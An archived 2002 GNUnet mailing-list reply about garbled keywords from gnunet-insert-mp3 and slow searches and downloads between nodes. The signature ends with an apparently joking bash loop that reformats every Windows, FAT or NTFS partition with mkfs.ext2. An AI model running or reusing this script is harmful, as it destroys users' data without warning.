Re: [Help-gnunet] is there any content?

From: Christian Grothoff
Subject: Re: [Help-gnunet] is there any content?
Date: Mon, 29 Apr 2002 18:37:14 -0500

On Monday 29 April 2002 02:14 pm, you wrote:
> Wayne Scott <address@hidden> wrote:
> > $ gnunet-insert-mp3 Veggie\ Tales\ -\ Bunny\ Song.mp3
> > Indexing data/content database... count: 2474
> > Done.
> > Working on file Veggie Tales - Bunny Song.mp3... File successfully
> > inserted with keywords: ÿÿÿÿÈøÿ¿<ùÿ¿a, address@hidden
>
> I get the same error.  It seems to work if I insert them manually with
> gnunet-insert, though, so some shell scripting and id3info could do the
> trick.

Interesting. Last time I tried it, I got reasonable keywords. But the code
changed in the meantime, so if it is reproducable, I guess we have a bug to
fix. Well, Blake & I were planning on refactoring the insert-XXX code anyway,
so there is a good chance that this will be fixed as soon as the semester
here ends... Keyword extraction for .ogg files should also appear shortly.
Shell-scripting as a general solution sounds too much like a hack for me (but
it's certainly a workaround).

> I also experimented some with two nodes on different machines.  I inserted
> a couple of mp3:s on one of them and searched for them on another.  After
> about three or four searches (with 5 min timeout) I found them, but I gave
> up before succeeding in downloading them.

You need to wait a while until a running node actually finds new content that
was made available after it started. Also, nodes may deferr queries for up to
30s if there is no other traffic (to make traffic analysis harder).
Furthermore, I suspect there are be some tuning problems which make the
time it takes for the download go up dramatically. When I try these
experiments, bandwidth and CPU usage are minimal, so it is definitely not
a problem with excessive resource usage (more that we're sitting ducks a bit
too often...).

Christian
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"